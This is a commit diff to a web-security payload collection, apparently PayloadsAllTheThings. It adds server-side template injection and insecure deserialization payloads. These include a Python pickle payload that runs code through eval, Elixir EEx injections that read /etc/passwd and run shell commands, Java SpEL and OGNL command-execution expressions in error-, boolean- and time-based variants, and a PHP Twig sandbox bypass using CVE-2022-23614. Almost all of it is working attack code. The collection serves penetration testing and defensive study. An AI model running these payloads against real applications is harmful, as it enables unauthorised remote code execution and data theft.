Merge pull request #820 from vladko312/master

swisskyrepo · web-flow · commit 2e32d27e474f · 2026-03-02T18:05:30.000+01:00
SSTI and Insecure Deserialization improvements based on the new version of my research
diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md
@@ -68,6 +68,28 @@ evil_token = b64encode(cPickle.dumps(e))
 print("Your Evil Token : {}").format(evil_token)
 ```
 
+A universal payload can be created by loading `os` at runtime using eval:
+
+```python
+import pickle
+import base64
+
+class RCE:
+    def __reduce__(self):
+        return eval, ("__import__('os').system('whoami')",)
+pickled = pickle.dumps(RCE())
+print(base64.b64encode(pickled).decode())
+```
+
+This approach allows running arbitrary python code, which allows us to use different techniques from code injection:
+
+```python
+__import__('os').system('whoami') # Reflected RCE
+getattr('', __import__('os').popen('whoami').read()) # Error-Based RCE
+1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE
+__include__("os").popen("id && sleep 5").read() # Time-Based RCE
+```
+
 ### PyYAML
 
 YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.
@@ -111,3 +133,4 @@ with open('exploit_unsafeloader.yml') as file:
 * [Python Yaml Deserialization - HackTricks - July 19, 2024](https://book.hacktricks.xyz/pentesting-web/deserialization/python-yaml-deserialization)
 * [PyYAML Documentation - PyYAML - April 29, 2006](https://pyyaml.org/wiki/PyYAMLDocumentation)
 * [YAML Deserialization Attack in Python - Manmeet Singh & Ashish Kukret - November 13, 2021](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf)
+* [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/Elixir.md b/Server Side Template Injection/Elixir.md
@@ -0,0 +1,66 @@
+# Elixir Deserialization
+
+> Server-Side Template Injection (SSTI)  is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur when using templating engines like EEx (Embedded Elixir), especially when user input is incorporated into templates without proper sanitization or validation.
+
+## Summary
+
+- [Templating Libraries](#templating-libraries)
+- [Universal Payloads](#universal-payloads)
+- [EEx](#eex)
+    - [EEx - Basic injections](#eex---basic-injections)
+    - [EEx - Retrieve /etc/passwd](#eex---retrieve-etcpasswd)
+    - [EEx - Remote Command execution](#eex---remote-command-execution)
+- [References](#references)
+
+## Templating Libraries
+
+| Template Name | Payload Format |
+|---------------|----------------|
+| EEx           | `<%= %>`       |
+| LEEx          | `<%= %>`       |
+| HEEx          | `<%= %>`       |
+
+## Universal Payloads
+
+Generic code injection payloads work for many Elixir-based template engines, such as EEx, LEEx and HEEx.
+
+By default, only EEx can render templates from string, but it is possible to use LEEx and HEEx as replacement engines for EEx.
+
+To use these payloads, wrap them in the appropriate tag.
+
+```erlang
+elem(System.shell("id"), 0) # Rendered RCE
+[1, 2][elem(System.shell("id"), 0)] # Error-Based RCE
+1/((elem(System.shell("id"), 1) == 0)&&1||0) # Boolean-Based RCE
+elem(System.shell("id && sleep 5"), 0) # Time-Based RCE
+```
+
+## EEx
+
+[Official website](https://hexdocs.pm/eex/1.19.5/EEx.html)
+> EEx stands for Embedded Elixir.
+
+### EEx - Basic injections
+
+```erlang
+<%= 7 * 7 %>
+```
+
+### EEx - Retrieve /etc/passwd
+
+```erlang
+<%= File.read!("/etc/passwd") %>
+```
+
+### EEx - Remote Command execution
+
+```erlang
+<%= elem(System.shell("id"), 0) %> # Rendered RCE
+<%= [1, 2][elem(System.shell("id"), 0)] %> # Error-Based RCE
+<%= 1/((elem(System.shell("id"), 1) == 0)&&1||0) %> # Boolean-Based RCE
+<%= elem(System.shell("id && sleep 5"), 0) %> # Time-Based RCE
+```
+
+## References
+
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
@@ -35,6 +35,9 @@
     - [SpEL - DNS Exfiltration](#spel---dns-exfiltration)
     - [SpEL - Session Attributes](#spel---session-attributes)
     - [SpEL - Command Execution](#spel---command-execution)
+- [Object-Graph Navigation Language](#object-graph-navigation-language)
+    - [OGNL - Basic Injection](#ognl---basic-injection)
+    - [OGNL - Command Execution](#ognl---command-execution)
 - [References](#references)
 
 ## Templating Libraries
@@ -46,7 +49,7 @@
 | Groovy        | `${ }`                 |
 | Jinjava       | `{{ }}`                |
 | Pebble        | `{{ }}`                |
-| Spring        | `*{ }`                 |
+| SpEL          | `*{ }`, `#{ }`, `${ }` |
 | Thymeleaf     | `[[ ]]`                |
 | Velocity      | `#set($X="") $X`       |
 
@@ -367,9 +370,12 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val
 
 ### SpEL - Basic Injection
 
+> SpEL has built-in templating system using `#{ }`, but SpEL is also commonly used for interpolation using `${ }`.
+
 ```java
 ${7*7}
 ${'patt'.toString().replace('a', 'x')}
+${T(java.lang.Integer).valueOf('1')}
 ```
 
 ### SpEL - Retrieve Environment Variables
@@ -440,6 +446,66 @@ ${pageContext.request.getSession().setAttribute("admin",true)}
     ${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())}
     ${request.getAttribute("a")}
     ```
+    
+- Error-Based payload:
+  
+    ```java
+    ${T(java.lang.Integer).valueOf("x"+T(java.lang.String).getConstructor(T(byte[])).newInstance(T(java.lang.Runtime).getRuntime().exec("id").inputStream.readAllBytes()))}
+    ```
+  
+- Boolean-Based payload:
+  
+    ```java
+    ${1/((T(java.lang.Runtime).getRuntime().exec("id").waitFor()==0)?1:0)+""}
+    ```
+  
+- Time-Based payload:
+  
+    ```java
+    ${(T(java.lang.Runtime).getRuntime().exec("id").waitFor().equals(0)?T(java.lang.Thread).sleep(5000):0).toString()}
+    ```
+
+## Object-Graph Navigation Language
+
+[Official website](https://commons.apache.org/dormant/commons-ognl/)
+
+> OGNL stands for Object-Graph Navigation Language; it is an expression language for getting and setting properties of Java objects, plus other extras such as list projection and selection and lambda expressions. You use the same expression for both getting and setting the value of a property.
+
+### OGNL - Basic Injection
+
+> OGNL can be used with different tags like `${ }`
+
+```java
+7*7
+'patt'.toString().replace('a', 'x')
+@java.lang.Integer@valueOf('1')
+```
+
+### OGNL - Command Execution
+
+Rendered:
+
+```java
+new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes())
+```
+
+Error-Based:
+
+```java
+(new String(@java.lang.Runtime@getRuntime().exec("id").getInputStream().readAllBytes()))/0
+```
+
+Boolean-Based:
+
+```java
+1/((@java.lang.Runtime@getRuntime().exec("id").waitFor()==0)?1:0)+""
+```
+
+Time-Based:
+
+```java
+((@java.lang.Runtime@getRuntime().exec("id").waitFor().equals(0))?@java.lang.Thread@sleep(5000):0)
+```
 
 ## References
 
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
@@ -47,9 +47,7 @@ system('id')
 
 // Error-Based RCE
 ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based
-fopen(join("", ["Y:/A:/", shell_exec('id')]), "r")
-include(join("", ["Y:/A:/", shell_exec('id')]))
-join("", ["xx", shell_exec('id')])()
+call_user_func(join("", ["xx", shell_exec('id')]))
 
 // Boolean-Based RCE
 1 / (pclose(popen("id", "wb")) == 0)
@@ -163,6 +161,8 @@ $output = $twig > render (
 
 {{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19
 {{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0
+
+{% set a = ["error_reporting", "1"]|sort("ini_set") %}{% set b = ["ob_start", "call_user_func"]|sort("call_user_func") %}{{ ["id", 0]|sort("system") }}{% set a = ["ob_end_flush", []]|sort("call_user_func_array")%} // Error-Based RCE with sandbox bypass using CVE-2022-23614
 {{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614
 ```
 
